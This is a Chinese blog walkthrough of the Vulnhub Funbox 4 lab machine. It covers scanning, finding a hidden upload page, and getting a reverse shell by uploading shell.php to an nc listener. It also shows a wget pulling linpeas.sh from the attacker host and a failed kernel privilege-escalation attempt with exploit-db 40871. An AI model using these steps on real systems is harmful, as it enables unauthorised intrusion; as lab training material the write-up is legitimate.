首页 > 其他分享 >Vulnhub之Funbox 4靶机详细测试过程(由于缺包,提权失败)

Vulnhub之Funbox 4靶机详细测试过程(由于缺包,提权失败)

时间:2023-01-10 10:23:35浏览次数:57  
标签:Status http kali 192.168 提权 403 Vulnhub Funbox Size

Funbox 4

识别目标主机IP地址

(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:75:6d:38      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.161  08:00:27:ca:ad:e9      1      60  PCS Systemtechnik GmbH        

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.161

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.161 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-09 03:28 EST
Nmap scan report for bogon (192.168.56.161)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f6:b3:8f:f1:e3:b7:6c:18:ee:31:22:d3:d4:c9:5f:e6 (RSA)
|   256 45:c2:16:fc:3e:a9:fc:32:fc:36:fb:d7:ce:4f:2b:fe (ECDSA)
|_  256 4f:f8:46:72:22:9f:d3:10:51:9c:49:e0:76:5f:25:33 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: UIDL RESP-CODES AUTH-RESP-CODE SASL TOP PIPELINING CAPA
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: OK LOGIN-REFERRALS more LOGINDISABLEDA0001 listed LITERAL+ post-login SASL-IR IMAP4rev1 ENABLE have capabilities Pre-login ID IDLE
MAC Address: 08:00:27:CA:AD:E9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.23 seconds

NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、110(POP3)、143(IMAP)

获得Shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ nikto -h http://192.168.56.161
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.161
+ Target Hostname:    192.168.56.161
+ Target Port:        80
+ Start Time:         2023-01-09 03:31:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 5ae05b2177aa4, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2023-01-09 03:32:48 (GMT-5) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.161
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,js,php,sh,txt
[+] Timeout:                 10s
===============================================================
2023/01/09 03:34:41 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 293]
/index.html           (Status: 200) [Size: 11321]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
/server-status        (Status: 403) [Size: 302]
Progress: 1322667 / 1323366 (99.95%)
===============================================================
2023/01/09 03:42:22 Finished
===============================================================

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ dirb http://192.168.56.161

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan  9 03:42:28 2023
URL_BASE: http://192.168.56.161/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.161/ ----
+ http://192.168.56.161/index.html (CODE:200|SIZE:11321)                                                                     
+ http://192.168.56.161/server-status (CODE:403|SIZE:302)                                                                    

-----------------
END_TIME: Mon Jan  9 03:42:31 2023
DOWNLOADED: 4612 - FOUND: 2

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.sh,.txt,.html,.js

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.sh,.txt,.html,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.161
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              html,js,php,sh,txt
[+] Timeout:                 10s
===============================================================
2023/01/09 03:42:55 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 302]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
Progress: 134847 / 373710 (36.08%)[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.txt": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:40 [!] parse "http://192.168.56.161/besalu\t.sh": net/url: invalid control character in URL
Progress: 142674 / 373710 (38.18%)[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2023/01/09 03:43:43 [!] parse "http://192.168.56.161/error\x1f_log.js": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/index.html           (Status: 200) [Size: 11321]
/.php                 (Status: 403) [Size: 293]
/.html                (Status: 403) [Size: 294]
Progress: 373419 / 373710 (99.92%)
===============================================================
2023/01/09 03:45:01 Finished
===============================================================

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.sh,.txt,.html,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.161
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              txt,html,js,php,sh
[+] Timeout:                 10s
===============================================================
2023/01/09 03:45:21 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 298]
/.htaccess.sh         (Status: 403) [Size: 301]
/.htaccess.php        (Status: 403) [Size: 302]
/.htaccess.html       (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 298]
/.htpasswd.txt        (Status: 403) [Size: 302]
/.htpasswd.sh         (Status: 403) [Size: 301]
/.htaccess.js         (Status: 403) [Size: 301]
/.htpasswd.php        (Status: 403) [Size: 302]
/.htpasswd.html       (Status: 403) [Size: 303]
/.htaccess.txt        (Status: 403) [Size: 302]
/.htpasswd.js         (Status: 403) [Size: 301]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 302]
Progress: 122093 / 122862 (99.37%)
===============================================================
2023/01/09 03:46:02 Finished
===============================================================

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.sh,.txt,.html,.js 
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.161
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,sh,txt,html,js
[+] Timeout:                 10s
===============================================================
2023/01/09 03:46:11 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 293]
/.hta.html            (Status: 403) [Size: 298]
/.hta.js              (Status: 403) [Size: 296]
/.hta.sh              (Status: 403) [Size: 296]
/.htaccess.js         (Status: 403) [Size: 301]
/.htaccess.txt        (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 298]
/.hta.txt             (Status: 403) [Size: 297]
/.hta.php             (Status: 403) [Size: 297]
/.htaccess.sh         (Status: 403) [Size: 301]
/.htpasswd            (Status: 403) [Size: 298]
/.htaccess.php        (Status: 403) [Size: 302]
/.htaccess.html       (Status: 403) [Size: 303]
/.htpasswd.sh         (Status: 403) [Size: 301]
/.htpasswd.php        (Status: 403) [Size: 302]
/.htpasswd.txt        (Status: 403) [Size: 302]
/.htpasswd.html       (Status: 403) [Size: 303]
/.htpasswd.js         (Status: 403) [Size: 301]
/index.html           (Status: 200) [Size: 11321]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 302]
Progress: 27343 / 28284 (96.67%)
===============================================================
2023/01/09 03:46:21 Finished
===============================================================

目录扫描一无所获。看了其他人的做法,是作者给出的以下提示:

Groundhog Day: Boot2Root !

Initial footstep is a bit flowed, but really not difficult.

After getting access to Funbox: CTF, its nessesarry to find, read and understand the (2 and easy to find) hints.

Be smart and combine...

Hints: Nikto scans "case sensitive" and you need a minimum of 15 mins to get user !

If you need hints, call me on twitter: @0815R2d2

Have fun...

作者提示目录文件时大小写敏感的,因此需要尝试一下ROBOTS.TXT文件

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ curl http://192.168.56.161/ROBOTS.TXT
Disallow: upload/


Disallow: igmseklhgmrjmtherij2145236

当访问第2个目录的时候,

Forbidden

You don't have permission to access /igmseklhgmrjmtherij2145236/ on this server.

这表明上述目录下有文件或者目录,不能直接访问:

──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gobuster dir -u http://192.168.56.161/igmseklhgmrjmtherij2145236/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.161/igmseklhgmrjmtherij2145236/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              php,txt,html,sh,js
[+] Timeout:                 10s
===============================================================
2023/01/09 03:54:17 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 321]
/.php                 (Status: 403) [Size: 320]
/upload               (Status: 301) [Size: 344] [--> http://192.168.56.161/igmseklhgmrjmtherij2145236/upload/]
/upload.html          (Status: 200) [Size: 297]
/upload.php           (Status: 200) [Size: 319]
Progress: 46232 / 1323366 (3.49%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/01/09 03:54:31 Finished
===============================================================

/upload.php可以上传文件

将shell.php上传至目标主机(没有任何限制)

访问:

http://192.168.56.161/igmseklhgmrjmtherij2145236/upload/shell.php

成功得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.161] 46542
Linux funbox4 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 09:58:12 up 32 min,  0 users,  load average: 0.48, 1.82, 3.23
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox4:/$ cd /home
cd /home
www-data@funbox4:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root   root   4.0K Aug 29  2020 .
drwxr-xr-x 23 root   root   4.0K Jan  9 09:55 ..
drwx------  4 anna   anna   4.0K Aug 30  2020 anna
drwxr-xr-x  4 thomas thomas 4.0K Aug 30  2020 thomas
www-data@funbox4:/home$ cd anna
cd anna
bash: cd: anna: Permission denied
www-data@funbox4:/home$ cd thomas
cd thomas
www-data@funbox4:/home/thomas$ ls -alh
ls -alh
total 3.0M
drwxr-xr-x 4 thomas thomas 4.0K Aug 30  2020 .
drwxr-xr-x 4 root   root   4.0K Aug 29  2020 ..
-rw------- 1 thomas thomas   46 Aug 30  2020 .bash_history
-rw-r--r-- 1 thomas thomas  220 Aug 29  2020 .bash_logout
-rw-r--r-- 1 thomas thomas 3.7K Aug 29  2020 .bashrc
drwx------ 2 thomas thomas 4.0K Aug 29  2020 .cache
-rw-r--r-- 1 thomas thomas  675 Aug 29  2020 .profile
drwx------ 2 thomas thomas 4.0K Aug 30  2020 .ssh
-rw-r--r-- 1 thomas thomas  195 Aug 29  2020 .todo
-rw------- 1 thomas thomas 1.3K Aug 30  2020 .viminfo
-rw-rw-r-- 1 thomas thomas  217 Aug 30  2020 .wget-hsts
-rwx------ 1 thomas thomas 3.0M Aug 22  2019 pspy64
www-data@funbox4:/home/thomas$ cd .ssh
cd .ssh
bash: cd: .ssh: Permission denied
www-data@funbox4:/home/thomas$ cat .todo
cat .todo
1. make coffee
2. check backup
3. buy ram
4. call simone
5. check my mails
6. call lucas
7. add an exclamation mark to my passwords
.
.
.
.
.
.
100. learn to read emails without a gui-client !!!
www-data@funbox4:/home/thomas$ 
www-data@funbox4:/$ cat hint.txt
cat hint.txt
The OS beard ist whiter and longer as Gandalfs one !
Perhaps, its possible to get root from here. 
I doesnt look forward to see this in the writeups/walktroughs, 
but this is murpys law !

Now, rockyou.txt isnt your friend. Its a little sed harder :-)

If you need more brainfuck: Take this:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

Bit more ?
Tm8gaGludHMgaGVyZSAhCg==

Not enough ?
KNSWC4TDNAQGM33SEB2G6ZDPOMXA====

www-data@funbox4:/$ 
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>++++++++++++++.>++++.---.<<++.>>+++++++++.---------.+++++++++++++++++++.----.<<.>>------------.+.+++++.++++++.<<.>>-----------.++++++++++.<<.>>-------.+++.------------.--.+++++++++++++++++++.---------------.-.<<.>>+++++.+++++.<<++++++++++++++++++++++++++.

用在线网站:

https://ctf.bugku.com/tool/brainfuck

解密得到:

The next hint is located in:
┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'Tm8gaGludHMgaGVyZSAhCg==' | base64 -d        
No hints here !

┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base64 -d
(Ԗ
  ��43}�����8��base64: invalid input

┌──(kali㉿kali)-[/usr/share/nmap/scripts]
└─$ echo 'KNSWC4TDNAQGM33SEB2G6ZDPOMXA====' | base32 -d
Search for todos.     

接下来上传linpeas.sh脚本到目标主机

www-data@funbox4:/tmp$ wget http://192.168.56.146:8000/linpeas.sh
wget http://192.168.56.146:8000/linpeas.sh
The program 'wget' is currently not installed. To run 'wget' please ask your administrator to install the package 'wget'
www-data@funbox4:/tmp$ which curl

但是目标主机没有wget或者curl,不过可以利用前面的upload.php实现上传

上传成功后mv到/tmp目录

www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236$ cd upload
cd upload
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ ls -alh
ls -alh
total 764K
drwxrwxrwx 2 root     root     4.0K Jan 10 02:50 .
drwxr-xr-x 3 root     root     4.0K Aug 29  2020 ..
-rw-r--r-- 1 www-data www-data 748K Jan 10 02:50 linpeas.sh
-rw-r--r-- 1 www-data www-data 5.4K Jan  9 09:57 shell.php
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ mv linpeas.sh /tmp
<tml/igmseklhgmrjmtherij2145236/upload$ mv linpeas.sh /tmp                   
www-data@funbox4:/var/www/html/igmseklhgmrjmtherij2145236/upload$ cd /tmp
cd /tmp
www-data@funbox4:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@funbox4:/tmp$ ls
ls
linpeas.sh
systemd-private-769b1209417348f8a413f39ddc14681b-dovecot.service-LxciIz
systemd-private-769b1209417348f8a413f39ddc14681b-systemd-timesyncd.service-XVpt1a
www-data@funbox4:/tmp$ 

执行linpeas.sh脚本:

╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                                                       
  [1] af_packet                                                                                                               
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010

将漏洞利用代码通过前面的http方式上传

┌──(kali㉿kali)-[~]
└─$ cd ~/Desktop/Vulnhub/Funbox4              
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ mv ~/Downloads/40871.c .             
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c  linpeas.sh  nmap_full_scan  shell.php

www-data@funbox4:/usr/bin$ ls -lha | grep gcc
ls -lha | grep gcc
www-data@funbox4:/usr/bin$  ls -alh /usr/bin/gcc-5
 ls -alh /usr/bin/gcc-5
ls: cannot access '/usr/bin/gcc-5': No such file or directory
www-data@funbox4:/usr/bin$ 

www-data@funbox4:/usr/bin$ cd /usr/share/gcc-5
cd /usr/share/gcc-5
www-data@funbox4:/usr/share/gcc-5$ ls -alh
ls -alh
total 12K
drwxr-xr-x   3 root root 4.0K Aug 29  2020 .
drwxr-xr-x 125 root root 4.0K Aug 29  2020 ..
drwxr-xr-x   3 root root 4.0K Aug 29  2020 python
www-data@funbox4:/usr/share/gcc-5$ cd python
cd python

虽然Linpeas.sh脚本输出结果中有gcc-5编译工具,但是却发现无法使用。

可以在Kali linux本地编译完成以后再上传

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c  linpeas.sh  nmap_full_scan  shell.php
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ gcc -o exploit 40871.c 
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]
└─$ ls
40871.c  exploit  linpeas.sh  nmap_full_scan  shell.php
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox4]

www-data@funbox4:/tmp$ ./exploit
./exploit
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./exploit)
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit)
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit)

提权失败

标签:Status,http,kali,192.168,提权,403,Vulnhub,Funbox,Size
From: https://www.cnblogs.com/jason-huawen/p/17039335.html

相关文章

  • Windows提权
    下边内容都是一些提权思路的整理,对于很多知识点并没有细化和深入,仅供个人参考,日后在实战中碰到了会深入学习并记录在新的文章中。基础知识权限组划分:Administrators:管......
  • Mysql提权
    UDF提权原理UDF(userdefinedfunction)即用户自定义函数是Mysql的一个拓展接口,用户通过自定义函数可以实现在Mysql中无法方便实现的功能,其添加的新函数都可以在SQL语句中......
  • Vulnhub之Funbox Gamble靶机测试过程(部分)
    Funbox6识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Funbox6]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|Sc......
  • vulnhub靶场Jangow: 1.0.1
    闲得无聊,好久没做题了。去vulnhub发现21年好多没做过。找了个Jangow:1.0.1做做,以此记录。导入到Vbox里正常启动。信息搜集虽然启动后控制台已经有IP了,但是假装不知道,......
  • Vulnhub之Funbox 11 (Scriptkiddie)靶机测试过程
    Funbox11(Scriptkiddie)作者:jason_huawen靶机信息名称:Funbox:Scriptkiddie地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/识别目标主机IP地址─(......
  • MSSQL数据库提权之XP_cmdshell提权
    xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。启用xp_cmdshell:EXEC......
  • MySQL数据库提权之UDF提权和MOF提权
    UDF提权概念:udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能。攻击者通过编写调用cmd或者shell的udf.dll文件,并且导入......
  • Vulnhub之Hacksudo Thor靶机详细测试过程
    HacksudoThor识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Hacksudo_Thor]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24......
  • Vulnhub之Hacksudo Fog靶机详细测试步骤(不同的渗透测试方法)
    HacksudoFog作者:jason_huawen靶机基本信息名称:hacksudo:FOG地址:https://www.vulnhub.com/entry/hacksudo-fog,697/识别目标主机IP地址(kali㉿kali)-[~/Desktop/V......
  • Linux提权之SUID提权
    概念SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限若是对一些特殊命令设置了SUID,那么就会有被提权的风险,常用的SUID提权命令有......